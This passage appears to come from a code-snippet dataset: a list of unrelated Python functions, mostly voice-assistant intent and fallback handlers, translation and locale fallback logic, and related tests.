\"\n \"You can ask when the next bus is coming!\")\n reprompt = \"You can ask when the next bus is arriving!\"\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback(self):\n pass", "def fallback(self):\n pass", "def get_fallback_url(self, request):\n tail = self.fallback_url or \"/\"\n if not tail.startswith(\"/\"):\n tail = \"/\" + tail\n return \"/\" + get_best_culture(request, self.name) + tail", "def fallback_handler(handler_input):\n speech_text = \"See you later! Enjoy the hackathon.\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).set_should_end_session(\n True)\n return handler_input.response_builder.response", "def _load_transliterated_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(\\\n self._transliterate_text(self.lblFallback['text'][start:]))\n pass", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The {} skill can't help you with that. \"\n \"You can tell me your favorite color by saying, \"\n \"my favorite color is red\").format(skill_name)\n reprompt = (\"You can tell me your favorite color by saying, \"\n \"my favorite color is red\")\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The {} skill can't help you with that. 
\"\n \"You can tell me your favorite color by saying, \"\n \"my favorite color is red\").format(skill_name)\n reprompt = (\"You can tell me your favorite color by saying, \"\n \"my favorite color is red\")\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback(self, kw):\n print(self.fallback_text.format(kw))\n return self.ask()", "def fallback_trans(x):\r\n t = _(x)\r\n if t == x:\r\n l = h.get_lang()\r\n h.set_lang('en', graceful_fail = True)\r\n t = _(x)\r\n if l and l[0] != 'en':\r\n h.set_lang(l[0])\r\n return t", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n session_attr = handler_input.attributes_manager.session_attributes\n\n speech_text = (\n \"The {} skill can't help you with that.\".format(SKILL_NAME))\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(False)\n return handler_input.response_builder.response", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def testAudioFallback(self):\n if self.audioFallback in tools.AUDIO_FALLBACKS:\n self.assertEqual(\n self.audioFallback,\n self.config.audioFallback\n )\n else:\n self.assertNotEqual(\n self.audioFallback,\n self.config.audioFallback\n )\n self.assertEqual(\n tools.AUDIO_FALLBACK_DEFAULT,\n self.config.audioFallback\n )", "def use_en(self):\n pass", "def _load_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(self.lblFallback['text'][start:])\n pass", "def test_fallback_language_no_current(self):\n x = SimpleModel()\n x.set_current_language(self.conf_fallback)\n x.tr_title = \"TITLE_FALLBACK\"\n\n self.assertEqual(\n x.safe_translation_getter(\"tr_title\", language_code=self.other_lang1), \"TITLE_FALLBACK\"\n )", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", "def adaptPythonToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptPythonToNeutral(self, *args)", "def on_intent(request, 
session):\n\n intent_name = request['intent']['name']\n\n # process the intents\n if intent_name == \"comenzar\":\n return get_fact_response()\n elif intent_name == \"otravez\":\n return get_fact_response()\n elif intent_name == \"AMAZON.YesIntent\":\n return get_fact_response()\n elif intent_name == \"AMAZON.NoIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n else:\n print(\"invalid Intent reply with help\")\n return get_help_response()", "def on_intent(intent_request, session):\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"CountryStatusIntent\":\n return get_country_info(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_start_end_response(False)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return get_start_end_response(True)\n else:\n return get_start_end_response(False)", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def _register_intent_services(bus):\n service = IntentService(bus)\n # Register handler to trigger fallback system\n bus.on(\n 'mycroft.skills.fallback',\n FallbackSkill.make_intent_failure_handler(bus)\n )\n return service", "def unhandled_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n intent_name = get_intent_name(handler_input)\n if intent_name == 'ChallengeBossIntent':\n speech_text = 'You need to be in the boss room to challenge the boss. '\n elif intent_name == 'EnterMazeIntent':\n speech_text = 'You already have a maze in progress. Would you like to resume the maze or discard the maze? '\n elif intent_name == 'ResumeMazeIntent' or intent_name == 'DiscardMazeIntent':\n speech_text = 'You are already in a maze or you don\\'t have a maze in progress. Say enter the maze or discard the maze. '\n elif intent_name == 'LocationIntent':\n speech_text = 'You need to be in a maze to locate yourself. Say enter the maze or resume the maze. '\n elif intent_name == 'MoveIntent':\n speech_text = 'You need to be in a maze to take a move. Say enter the maze or resume the maze. '\n else:\n speech_text = 'I am not sure what you are saying. 
'\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(False)\n return handler_input.response_builder.response", "def adaptNeutralToPython(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToPython(self, *args)", "def test_fallback_language(self):\n x = SimpleModel()\n x.set_current_language(self.conf_fallback)\n x.tr_title = \"TITLE_FALLBACK\"\n\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n x.save()\n\n with translation.override(self.other_lang2):\n x = SimpleModel.objects.get(pk=x.pk)\n self.assertEqual(x.tr_title, \"TITLE_FALLBACK\")", "def handle_answer_request(intent, session):\n\n eins_list = [\"eins\", \"ein\", \"einer\", \"eine\", \"einen\", \"eines\", \"einem\"]\n \n if intent[\"name\"] == \"DontKnowIntent\":\n answer = \"weiß nicht\"\n elif \"Nummer\" in intent[\"slots\"].keys() and \"value\" in intent[\"slots\"][\"Nummer\"]:\n answer = intent[\"slots\"][\"Nummer\"][\"value\"]\n elif \"Antworten\" in intent[\"slots\"].keys() and \"value\" in intent[\"slots\"][\"Antworten\"]:\n answer = intent[\"slots\"][\"Antworten\"][\"value\"]\n else:\n answer = \"Fehler\"\n \n #Necessary to recognize \"1\":\n if answer in eins_list:\n answer = \"1\"\n elif answer == \"ein mal\":\n answer = \"einmal\"\n answer = answer.lower()\n\n print(\"handle_answer_request: \", intent, \"answer: \", answer)\n\n if \"attributes\" not in session:\n return start_game(answer, session)\n elif session[\"attributes\"][\"state\"] == \"Gameon\":\n return check_answer(answer, session)\n elif session[\"attributes\"][\"state\"] == \"Start\":\n return start_game(answer, session)\n\n return start_game(answer, session)", "def test_fallback_values_2(self):\n title1_de = \"title de\"\n text1_de = \"text in german\"\n n = TestModelWithFallback2()\n n.title = title1_de\n n.text = text1_de\n n.save()\n del n\n n = TestModelWithFallback2.objects.get(title=title1_de)\n trans_real.activate(\"en\")\n self.failUnlessEqual(n.title, title1_de)\n self.failUnlessEqual(n.text,\\\n TestTranslationOptionsWithFallback2.fallback_values['text'])", "def adaptCorbaToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptCorbaToNeutral(self, *args)", "def add_fallback(self, fallback):\n with Translations._cache_lock:\n for key, value in Translations._cache.items():\n if id(self) == id(value):\n del Translations._cache[key]\n break\n if self._fallback:\n self._fallback.add_fallback(fallback)\n else:\n self._fallback = fallback", "def test_fallback_values_1(self):\n title1_de = \"title de\"\n n = TestModelWithFallback()\n n.title = title1_de\n n.save()\n del n\n n = TestModelWithFallback.objects.get(title=title1_de)\n self.failUnlessEqual(n.title, title1_de)\n trans_real.activate(\"en\")\n self.failUnlessEqual(n.title, \"\")", "def handle_unknown_message(event):\n text_message = TextSendMessage(text='無法理解此訊息: \"{}\"'.format(event.message.text))\n line_bot_api.reply_message(event.reply_token, text_message)", "async def _async_process_intent(hass: HomeAssistant, domain: str, platform):\n await platform.async_setup_intents(hass)", "def adaptXmlToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptXmlToNeutral(self, *args)", "def test_00_i18n_anonymous(self):\r\n # First default 'en' locale\r\n with self.app as c:\r\n err_msg = \"The page should be in English\"\r\n res = c.get('/', headers=[('Accept-Language', 'en')])\r\n assert \"Community\" in res.data, err_msg\r\n # Second with 'es' locale\r\n with self.app as c:\r\n err_msg = \"The page should be in 
Spanish\"\r\n res = c.get('/', headers=[('Accept-Language', 'es')])\r\n assert \"Comunidad\" in res.data, err_msg", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n \r\n if intent_name == \"unsafe\":\r\n send_message_alerts()\r\n session_attributes = {}\r\n card_title = \"Welcome, this is Emma\"\r\n speech_output = \"Calling police, Connected with police , Police on the way. Police will be in 1 min . Your relatives and frieds are all informed. Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me\"\r\n \r\n # If the user either does not reply to the welcome message or says something\r\n # that is not understood, they will be prompted again with this text.\r\n reprompt_text = \"Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me \"\r\n \r\n should_end_session = False\r\n return build_response(session_attributes, build_speechlet_response(\r\n card_title, speech_output, reprompt_text, should_end_session))\r\n \r\n \r\n \r\n elif intent_name == \"AMAZON.HelpIntent\":\r\n return get_welcome_response()\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return handle_session_end_request()\r\n else:\r\n raise ValueError(\"Invalid intent\")", "def _default_handler(self, iq):\n raise XMPPError('service-unavailable')", "def fallback_host(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"fallback_host\")", "def fallback_host(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"fallback_host\")", "def test_py2_application_exception_message_unicode_english():\n try:\n raise ValueError(UNICODE_ENGLISH)\n except ValueError:\n app = application()\n notice_error(application=app)", "def localizedWithFallback(field, allowEmpty=True):\n for lang in [''] + FallbackLanguages():\n t = field[lang]\n if allowEmpty:\n if isinstance(t, basestring):\n return t\n elif t:\n return t\n return u\"\"", "def get_english_env(env):\n if sys.platform == 'win32':\n return None\n env = env or os.environ\n\n # Test if it is necessary at all.\n is_english = lambda name: env.get(name, 'en').startswith('en')\n\n if is_english('LANG') and is_english('LANGUAGE'):\n return None\n\n # Requires modifications.\n env = env.copy()\n def fix_lang(name):\n if not is_english(name):\n env[name] = 'en_US.UTF-8'\n fix_lang('LANG')\n fix_lang('LANGUAGE')\n return env", "def _unknown_app(self):\n self.make_unknown()", "def use_zh(self):\n pass", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # Dispatch to your skill's intent handlers\n if intent_name == \"test\":\n return get_test_response()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"forecast\":\n return get_forecast_response()\n elif intent_name == \"detailedforecast\":\n return get_detailed_forecast_response()\n elif intent_name == \"uscanadaforecast\":\n return get_uscanada_forecast_response()\n elif intent_name == \"detaileduscanadaforecast\":\n return get_detailed_uscanada_forecast_response()\n elif intent_name == \"AMAZON.CancelIntent\" or 
intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def fallback(self) -> Fallback:\n return Fallback(self)", "def fallback_host(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"fallback_host\")", "def on_intent(request, session):\n\n intent = request['intent']\n\n print(\"on_intent:\", intent)\n\n if intent[\"name\"] == \"AntwortIntent\":\n return handle_answer_request(intent, session)\n elif intent[\"name\"] == \"DontKnowIntent\":\n return handle_answer_request(intent, session)\n elif intent['name'] == \"AMAZON.RepeatIntent\":\n return handle_repeat_request(intent, session)\n elif intent['name'] == \"AMAZON.StopIntent\" or intent['name'] == \"AMAZON.CancelIntent\":\n return handle_finish_session_request(intent, session)\n elif intent['name'] == \"AMAZON.HelpIntent\":\n return get_help(intent, session)\n elif intent['name'] == \"StartQuizIntent\" or intent['name'] == \"AMAZON.StartoverIntent\":\n if session[\"new\"] == False:\n return get_welcome_message(restart=True)\n #if no intent is identified:\n return get_help(intent, session)", "def test_single_locale_activation(self):\n with translation.override(\"fr\"):\n self.assertEqual(\n self.get_template(\n \"{% load i18n %}{% blocktranslate %}Yes{% endblocktranslate %}\"\n ).render(Context({})),\n \"Oui\",\n )", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n lang = handler_input.request_envelope.request.locale\n try:\n speech = welcome_speech[lang]\n except:\n speech = \"Language \" + lang + \" is not supported.\"\n\n handler_input.response_builder.speak(\n speech).ask(help_text)\n return handler_input.response_builder.response", "def adaptNeutralToCpp(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToCpp(self, *args)", "def test_py3_application_exception_message_unicode_english():\n try:\n raise ValueError(UNICODE_ENGLISH)\n except ValueError:\n app = application()\n notice_error(application=app)", "def test_save_ignore_fallback_marker(self):\n x = SimpleModel()\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n x.set_current_language(self.other_lang2)\n # try fetching, causing an fallback marker\n x.safe_translation_getter(\"tr_title\", any_language=True)\n # Now save. This should not raise errors\n x.save()", "def fallbackSeries(requestContext, seriesList, fallback):\n if len(seriesList) > 0:\n return seriesList\n else:\n return fallback", "def conversation_fallback(update: Update, _: CCT) -> int:\n cast(User, update.effective_user).send_message('Invalid input. 
Aborting operation.')\n\n return ConversationHandler.END", "def adaptNeutralToCorba(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToCorba(self, *args)", "def setUp(self):\n super().setUp()\n translation.activate(\"en-us\")", "def unknown(update, context):\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Sorry, dat commando is onbekend.\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent_name = \"\"\n if 'intent' in intent_request:\n intent = intent_request['intent']\n if 'name' in intent:\n intent_name = intent['name']\n\n # Dispatch to your skill's intent handlers\n if not intent_name:\n return get_help_response()\n elif intent_name == \"Hello\":\n return say_hello()\n elif intent_name == \"Brandon\":\n return say_brandon()\n elif intent_name == \"Warning\":\n return say_warning()\n elif intent_name == \"Dance\":\n return say_dance_lights()\n elif intent_name == \"Spot\":\n return say_spot_light()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n return say_hello()\n return get_help_response()", "def handle_700(self, ievent):\n\n try:\n self.encoding = ievent.arguments[1]\n rlog(10, self.name, '700 encoding now is %s' % self.encoding)\n except:\n pass", "def add_localizer(event):\r\n request = event.request\r\n localizer = get_localizer(request)\r\n def auto_translate(*args, **kwargs):\r\n return localizer.translate(tsf(*args, **kwargs))\r\n def auto_pluralize(*args, **kwargs):\r\n kwargs.setdefault(\"domain\", \"faapp\")\r\n return localizer.pluralize(*args, **kwargs)\r\n request.localizer = localizer\r\n request.translate = auto_translate\r\n request.ungettext = auto_pluralize\r\n request.environ['fa.translate'] = auto_translate", "def on_intent(request, session):\n\n intent_name = request['intent']['name']\n \n # process the intents\n if intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n \n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n \n elif intent_name == \"recognizeDates\":\n slots = request['intent']['slots']\n date_start_slot = slots.get('dateStart',{'value':'NA'}).get('value','NA')\n date_end_slot = slots.get('dateEnd',{'value':'NA'}).get('value','NA')\n\n return get_intent_response(date_start_slot,date_end_slot)\n \n elif intent_name == \"PollHprofs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n elif intent_name == \"SpinVMs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n else:\n print(\"For invalid Intents reply with help\")\n return get_help_response()", "def get_lang_code(lang_code):\r\n if lang_code not in constants.SUPPORTED_LANG_CODES_ANALYZERS:\r\n return constants.FALLBACK_LANG_CODE\r\n return lang_code", "def get_locale():\n return \"he\"", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n 
intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n elif intent_name == \"Ja_Bitte\":\n return Ja_Bitte_session(intent, session)\n else:\n raise ValueError(\"Invalid intent\")", "def handle_intent(intent_name):\n if intent_name in name_to_handler:\n return name_to_handler[intent_name]()\n else:\n return question_answer(intent_name)", "def test_fallback_variant(self):\n x = SimpleModel()\n\n x.set_current_language(\"de\")\n x.tr_title = \"Hallo-de\"\n\n x.set_current_language(\"en\")\n x.tr_title = \"Hello-en\"\n\n x.save()\n\n with translation.override(\"de-ch\"):\n x = SimpleModel.objects.get(pk=x.pk)\n self.assertEqual(x.tr_title, \"Hallo-de\")", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n\n if intent_name not in skillmap:\n intent_name = \"NullSkill\"\n\n if intent_name in skillmap:\n try:\n return skillmap[intent_name].execute(intent, session)\n except Exception as e:\n traceback.print_exc()\n return SkillBase().respond(\"Sorry I missed that\", \"Error\", str(e))\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(event_request, session):\n print(\"=====on_intent requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = event_request['intent']\n intent_name = event_request['intent']['name']\n print(\"=====intent is: \" + intent_name)\n\n if intent_name == \"AnswerIntent\":\n print(\"=====AnswerIntent fired...\")\n if 'attributes' in session:\n if 'questions' in session['attributes']:\n return handle_answer_request(intent, session)\n\n # we probably got here because user said something other than\n # yes or no after asking if they wanted to play the game again\n print(\"=====no attributes ending game\")\n return play_end_message()\n if intent_name == \"GameIntent\":\n print(\"=====GameIntent fired...\")\n # if there's a session and we're in a game treat this as an answer\n # unfortunately it will be wrong but it's better than starting over\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n return play_new_game(False)\n if intent_name in (\"AMAZON.StartOverIntent\", \"AMAZON.YesIntent\"):\n print(\"=====StartOverIntent or YesIntent fired...\")\n return play_new_game(True)\n if intent_name == \"AMAZON.NoIntent\":\n print(\"=====NoIntent fired...\")\n # if there's a session and we're in a game treat this as a wrong answer\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n # otherwise end the game\n return play_end_message()\n if intent_name in (\"AMAZON.StopIntent\", \"AMAZON.CancelIntent\"):\n print(\"=====StopIntent or CancelIntent fired\")\n return play_end_message()\n if intent_name == 'AMAZON.HelpIntent':\n print(\"=====HelpIntent...\")\n tts = \"During the game I'll give you 6 random brain teasers and only 8 \"\\\n \"seconds to anser each one... To make your mind muscles stronger, I \"\\\n \"won't repeat any of the questions, so try to remember all the \"\\\n \"details... 
You can say 'Start Over' if you'd like a new game, \"\\\n \"or make your guess for the last question...\"\n return speech(tts, session['attributes'], False, None)", "def test_any_fallback_model(self):\n x = AnyLanguageModel()\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n\n x.save()\n\n with translation.override(self.other_lang2):\n x = AnyLanguageModel.objects.get(pk=x.pk)\n self.assertRaises(\n TranslationDoesNotExist, lambda: x._get_translated_model(use_fallback=True)\n )\n self.assertEqual(\n x.tr_title, \"TITLE_XX\"\n ) # Even though there is no current language, there is a value.\n\n self.assertNumQueries(\n 0, lambda: x._get_any_translated_model()\n ) # Can fetch from cache next time.\n self.assertEqual(x._get_any_translated_model().language_code, self.other_lang1)", "def setPortalLocale( self ):\n info = getLanguageInfo( self )\n\n # find default and effective locale settings\n def_locale = info.get( sys.platform + '_locale' ) or info.get( os.name + '_locale' )\n cur_locale = getlocale()\n cur_locale = None not in cur_locale and '.'.join( cur_locale ) or ''\n\n # check whether locale is already ok\n if def_locale is None or cur_locale.lower() == def_locale.lower():\n return\n\n # change effective locale\n try:\n setlocale( LC_ALL, def_locale )\n except Exceptions.LocaleError:\n pass", "def convertNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_convertNeutral(self, *args)", "def test_fallback_status_emoji(self):\n self.assertEqual(get_emoji_for_status(None), \"\")", "def _insert_default_fallback(self):\n db.add_destination_with_aliases(self.dbm,\n \"https://duckduckgo.com?q={}\",\n \"DuckDuckGo\",\n [\"ddg\"],\n True,\n True)", "def test_single_locale_activation(self):\n with translation.override('fr'):\n self.assertEqual(\n Template(\"{% load i18n %}{% blocktrans %}Yes{% endblocktrans %}\").render(Context({})),\n 'Oui'\n )", "def fallback_status_codes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"fallback_status_codes\")", "def fallback_status_codes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"fallback_status_codes\")", "def handle_webdefaultallow(bot, ievent):\n cfg.set('whitelistenable', 0)\n ievent.reply('ok')", "def with_manual_check_fallback(self):\n self.__manual_check = constants.FALLBACK\n return self", "def add_support_for_localization():\n path = os.path.join(os.path.abspath(sys.argv[0]), os.pardir, os.pardir)\n possible_topdir = os.path.normpath(path)\n if os.path.exists(os.path.join(possible_topdir, 'nova', '__init__.py')):\n sys.path.insert(0, possible_topdir)\n\n gettext.install('nova', unicode=1)", "def Locale_IsAvailable(*args, **kwargs):\n return _gdi_.Locale_IsAvailable(*args, **kwargs)", "def test_locale_not_available(self):\n LocaleFactory.create(code='fakelocale')\n ProjectFactory.create(slug='valid-project')\n\n response = self.client.get('/fakelocale/valid-project/')\n assert_redirects(response, reverse('pontoon.home'))\n assert_equal(self.client.session['translate_error'], {'none': None})", "def handle_complete_intent_failure(message: Message):\n LOG.info(\"Failed to find intent.\")\n # context = {'client_name': 'mycroft_listener',\n # 'source': 'audio',\n # 'destination': [\"skills\"]}\n bus.emit(message.forward(\"complete.intent.failure\", message.data))", "def auto_lang(self, kwargs):\n\n destination = kwargs.get('destination')\n\n # If the destination is a discord.Channel or a discord.Member\n # (or any other destination instance 
that has the 'server' attribute)\n if hasattr(destination, 'guild'):\n return self.get_lang(destination.guild, destination)\n\n # If the destination is a user\n elif isinstance(destination, discord.channel.DMChannel) \\\n or isinstance(destination, discord.channel.GroupChannel):\n # The event could've been triggered from a guild, so use its language\n if hasattr(kwargs, 'event') and not kwargs['event'].is_pm:\n return self.get_lang(kwargs['event'].guild, kwargs['event'].channel)\n\n if isinstance(destination, discord.channel.GroupChannel):\n user = destination.owner\n else:\n user = destination.recipient\n\n if user.id in self.autolang_cache:\n return self.get_lang(self.autolang_cache[user.id])\n\n # Fetch common guilds between the user and the bot, and get the guilds languages.\n langs = [\n self.bot.sv_config.get(sv.id, 'lang', self.bot.config['default_lang'])\n for sv in self.bot.servers if sv.get_member(user.id) is not None\n ]\n\n # If there are no common guilds, just use the default language\n # (but it's kinda rare to talk to a bot that you don't have any guild in common, right?)\n if len(langs) == 0:\n return self.get_lang()\n\n # Get the mode language from the common user-bot guilds and use it.\n mode_lang = max(set(langs), key=langs.count)\n self.autolang_cache[user.id] = mode_lang\n self.log.debug('Language automatically set to %s for user \"%s\"', mode_lang, str(user))\n\n return self.get_lang(mode_lang)\n\n # Return the default language\n else:\n return self.get_lang()", "def default_locale(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"default_locale\")", "def default_locale(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"default_locale\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n print(\"---INTENT: \" + intent_name)\n\n # Dispatch to your skill's intent handlers\n try:\n if intent_name == \"GetSynonymIntent\":\n return get_synonym(intent, session)\n elif intent_name == \"GetRandomSynonymIntent\":\n return get_random_synonym(intent, session)\n elif intent_name == \"GetAllSynonymsIntent\":\n return get_all_synonyms(intent, session)\n elif intent_name == \"GetAntonymIntent\":\n return get_antonym(intent, session)\n elif intent_name == \"GetRandomAntonymIntent\":\n return get_random_antonym(intent, session)\n elif intent_name == \"GetAllAntonymsIntent\":\n return get_all_antonyms(intent, session)\n elif intent_name == \"GetPOSIntent\":\n return get_pos(intent, session)\n elif intent_name == \"GetRhymeIntent\":\n return get_rhyme(intent, session)\n elif intent_name == \"GetRandomRhymeIntent\":\n return get_random_rhyme(intent, session)\n elif intent_name == \"GetDefinitionIntent\":\n return get_definition(intent, session)\n elif intent_name == \"GetRandomDefinitionIntent\":\n return get_random_definition(intent, session)\n elif intent_name == \"GetAllDefinitionsIntent\":\n return get_all_definitions(intent, session)\n elif intent_name == \"GetSyllablesIntent\":\n return get_syllables(intent, session)\n elif intent_name == \"GetFrequencyIntent\":\n return get_frequency(intent, session)\n elif intent_name == \"GetPronunciationIntent\":\n return get_pronunciation(intent, session)\n elif intent_name == \"GetAllCommandsIntent\":\n return get_all_commands()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name 
== \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that command. I can find definitions, synonyms, antonyms, and more if you say something like 'a synonym for happy'.\", None, True)\n return build_response({}, response)\n\n except:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that word!\", None, True)\n return build_response({}, response)", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"HelloWorldIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def tr(self, message):\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Hybriddekning', message)", "async def test_unsupported_domain(hass):\n request = get_new_request(\"Alexa.Discovery\", \"Discover\")\n\n hass.states.async_set(\"woz.boop\", \"on\", {\"friendly_name\": \"Boop Woz\"})\n\n msg = await smart_home.async_handle_message(hass, DEFAULT_CONFIG, request)\n\n assert \"event\" in msg\n msg = 